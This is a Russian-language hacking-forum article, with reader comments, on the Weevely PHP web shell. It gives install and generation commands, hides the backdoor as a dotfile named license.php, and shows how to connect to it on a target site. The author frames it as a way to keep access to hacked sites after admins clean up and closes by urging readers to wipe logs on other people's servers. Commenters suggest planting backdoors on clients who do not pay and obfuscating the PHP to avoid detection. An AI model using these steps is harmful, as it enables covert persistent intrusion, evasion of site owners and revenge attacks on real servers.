• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Weevely или оставляем дверь приоткрытой

Добрый день, виртуальные волшебники. На сегодняшний день, очень популярно оставлять на хакнутых сайтах подсказки, следы, такие как выдуманное название несуществующей хакерской группировки, или как правило, "Hacked by Вася Пупкин".
После того как сисадмин поймет неладное, он сразу пойдет забэкапить базу данных, меняя все данные для входа, начиная админ панелью и заканчивая FTP сервером. Но, одно большое но.
На личном опыте удостоверился, что 70% админов, не чекают, а вдруг в корне бэкдор с волшебной точной в начале?
А ведь почти ни один из файловых менеджеров не видит скрытые файлы, понимаете о чем я?
Так вот, ленивый админ, жди того же Васю очередной раз в гостях на сервере. А как? Что дает этот бэкдор?
Да так, всего лишь удаленный доступ к серверу. Теории думаю хватит, начнем.

certified-ethical-hacking-1200x400.jpg
Weevely – это веб-шелл командной строки, динамически распространяемый по сети во время выполнения, предназначен для удалённого администрирования и тестирования на проникновение. Просто закиньте PHP скрипт, и программа обеспечит похожий на ssh терминал даже в ограниченном окружении.
  • Похожий на SSH терминал
  • Запуск SQL консоли, завёрнутой на цель
  • Пропуск HTTP трафика до цели через прокси
  • Аудит безопасности настройки хоста
  • Локальное монтирование целевой файловой системы
  • Проведение сетевых сканирований завёрнутых на цель
  • Выгрузка и загрузка файлов
  • Порождение обратного и прямого TCP шелла
  • Брут-форс внутренних служб
  • Управление сжатыми архивами
  • Агент бэкдора
С инструментом познакомились, теперь будем устанавливать его. В некоторых дистрибутивах Linux, он установлен. Поможем тем, у кого его нету.
Для начала, обновимся
apt-get update
Далее, устанавливаем необходимые пакеты и зависимости
sudo apt-get install g++ python-pip libyaml-dev python-dev
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade
Теперь качаем репозиторий с гитаба
git clone https://github.com/epinna/weevely3

Снимок экрана 2019-08-15 в 13.20.27.png


После скачивания, переходим в ее папку и смотрим список файлов
cd weevely3 && ls

Снимок экрана 2019-08-15 в 13.20.56.png


Видим питоновский скрипт инструмента weevely.py. Его и запускаем

python weevely.py

Снимок экрана 2019-08-15 в 13.28.39.png


Как мы видим, у инструмента есть три команды.
  1. Подключиться к существующему бэкдору
  2. Восстановить существующую сессию подключения
  3. Сгенерировать новый бэкдор
Пока что, у нас нету на сервере бэкдора, поэтому, создадим новую папку и в нем сгенерируем новый бэкдор
mkdir backdoor
И генерируем
python2 weevely.py generate codeby backdoor/license.php

Снимок экрана 2019-08-15 в 13.36.32.png


Видим что создался php скрипт, а точнее веб-шелл. Сделаем его не видимым для некоторых лиц, добавив в начале названия точку
Переходим в папку с бэкдором и переименовываем
mv license.php .license.php
Проверим

Снимок экрана 2019-08-15 в 13.39.56.png


К чему мы и стремились, при простом просмотре списка файлов с помощью команды ls, мы ничего не увидели. Однако если выполнить команду ls -la, мы увидим абсолютно все файлы в определенной директории.
Наш backdoor готов. Осталось хакнуть сайт Трампа и спрятать наш бэкдор там. Для теста, подойдет локальный сервер. Загружаем скрипт на сервер и подключаемся к нему
python2 weevely.py http://site.ru/.license.php codeby
http://site.ru/.license.php - полный путь до бэкдора
codeby - пароль для коннекта к бэкдору, который мы указывали при генерации

Снимок экрана 2019-08-15 в 14.04.20.png


Nice! Мы законнектились к бэкдору, и как видно на скриншоте, удачно выполнили несколько команд.

На этом все друзья, не забывайте очищать все логи после своих операций на чужом сервере. Удачи всем!
 

Вложения

  • Снимок экрана 2019-08-15 в 13.20.56.png
    Снимок экрана 2019-08-15 в 13.20.56.png
    8,1 КБ · Просмотры: 420
  • Снимок экрана 2019-08-15 в 13.28.39.png
    Снимок экрана 2019-08-15 в 13.28.39.png
    14,9 КБ · Просмотры: 430
  • Снимок экрана 2019-08-15 в 13.20.27.png
    Снимок экрана 2019-08-15 в 13.20.27.png
    15,4 КБ · Просмотры: 343
  • Снимок экрана 2019-08-15 в 13.36.32.png
    Снимок экрана 2019-08-15 в 13.36.32.png
    12,6 КБ · Просмотры: 425

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
На сегодняшний день, очень популярно оставлять на хакнутых сайтах подсказки, следы, такие как выдуманное название несуществующей хакерской группировки, или как правило, "Hacked by Вася Пупкин".
На сегодняшний день полезно быть полным идиотом)
 

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
Будь идиотом, и ты поведешься на фишинговый сайт. Так что, мы стремимся к инфопознаниям.
Мда.. ты либо не понял мою шутку в том что подобным образом поступают лишь идиоты, либо поддался моде )) инфопозновальщик млять
 

SearcherSlava

Red Team
10.06.2017
943
1 259
BIT
109
Здравы будьте, информационно небезопасные братья и сестры во Гугле!

Дураки умирают по пятницам, В крайнем случае, по субботам.
И никто их, никто их не хватится, Разве только начальник с работы

Позвонит безутешным родителям, Позвонит в понедельник с планёрки:
«Где сотрудник там наш, подскажите-ка?..Как так помер?.. Да, ладно?.. Эх, ёлки...»

Но всё это досужая мистика, Мы в неё не поверим, конечно.
Нам упрямо вещает статистика: С каждым днём их становится меньше.

Вы не чуете в этом опасности? Им нельзя размножаться в неволе:
В наши дни Василисы Прекрасные С ними ложе делить не готовы.

Василисам бы бабки Кощеевы, Или прынца с огромным кинжалом.
С дурака-то и взять даже нечего. Он, болезный, всё давит на жалость.

Только если беда приключается, То дурак не брюзжит и не хнычет.
Он, чёрт знает докуда, дочапает, И, чёрт знает кого, там разыщет.

И полцарства потом не потребует, А вернётся к сохе да мотыге…
Вот дурак! И пора бы, наверное, Занести его в Красные книги.

Ни рекламы здесь нет, ни политики, Ни метафор с запалом фугаса.
Люди, вы дураков берегите-ка: Я, возможно, последний остался.
 

N1GGA

Codeby Team
Platinum
16.07.2018
326
331
BIT
184
Мда.. ты либо не понял мою шутку в том что подобным образом поступают лишь идиоты, либо поддался моде )) инфопозновальщик млять
Сначала не понял. Ну рили, у нас же нету способностей читать мысли)
А про Васю скажу, что поступают так не только идиоты. Кто-то развлекается этим, а кто-то, просто дает о себе знать.
 

pp11

Green Team
16.09.2018
201
82
BIT
0
Довольно удобный инструмент, все сделано за тебя. И генерация, и подключение.
Неплохо было бы узнать как заливать бэкдоры на сайты, как получить доступ.

Спасибо за статью, хоть я и знал про него.
 

N1GGA

Codeby Team
Platinum
16.07.2018
326
331
BIT
184
Довольно удобный инструмент, все сделано за тебя. И генерация, и подключение.
Неплохо было бы узнать как заливать бэкдоры на сайты, как получить доступ.

Спасибо за статью, хоть я и знал про него.
Есть много способов залить шелл. Если написать об этому статью, то получится толстая книга, ведь даже в паблике существует не мало подходов для этого.
 
  • Нравится
Реакции: Marylin

centr

Green Team
31.01.2017
408
475
BIT
0
...
Неплохо было бы узнать как заливать бэкдоры на сайты, как получить доступ.
.....


На форуме есть и другие статьи с примерами.
 
  • Нравится
Реакции: N1GGA, pp11 и Marylin

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
пригодится всякого рода разрабам сайта, которых в последнее время кидают на деньги) с такой методой можно жестко настигнуть неправильного заказчика! пусть не сразу а через месяцок))) + свои js подвесить , ну это уже другая история...

для сокрытия сего деяния рекоомендую обфусцировать php заднюю дверку на гитике их много обфускаторов)
 

centr

Green Team
31.01.2017
408
475
BIT
0
для сокрытия сего деяния рекоомендую обфусцировать php заднюю дверку на гитике их много обфускаторов)
v1ll41n/Und3rCov3r

PHP 7 не работает non-alphanumeric обфускация, точнее не работают те варианты которые приведены по этим ссылкам.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!